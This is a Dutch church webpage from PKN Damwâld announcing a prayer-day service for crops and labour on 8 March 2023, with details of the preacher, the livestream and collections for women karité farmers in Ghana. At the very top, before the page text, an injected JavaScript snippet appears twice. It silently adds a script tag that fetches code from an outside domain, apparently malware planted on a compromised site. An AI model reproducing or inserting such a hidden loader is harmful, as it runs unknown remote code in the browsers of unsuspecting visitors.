;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Biddag voor gewas en arbeid - PKN Damwâld
woensdag 8 maart 2023
19:30 uur

Biddag voor gewas en arbeid

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Collecte Diaconie Biddagcollecte Kerk in Actie (collectenr. 23021)

Ghana - Een beter inkomen voor boerinnen
Noord-Ghana is een droge regio. Het is moeilijk om hier rond te komen met de opbrengsten van landbouw, terwijl dat wel de belangrijkste bron van inkomsten is. Veel mensen leven dan ook in armoede. Vrouwen proberen op allerlei manieren een bijdrage te leveren aan het gezinsinkomen. Een van die manieren is het verzamelen en verwerken van kariténoten. De Presbyteriaanse Kerk in Ghana helpt vrouwen om dit zo goed mogelijk te doen en de beste prijs voor hun noten en boter te krijgen.

Uitganscollecte: Uitgangscollecte t.b.v. de gestegen energiekosten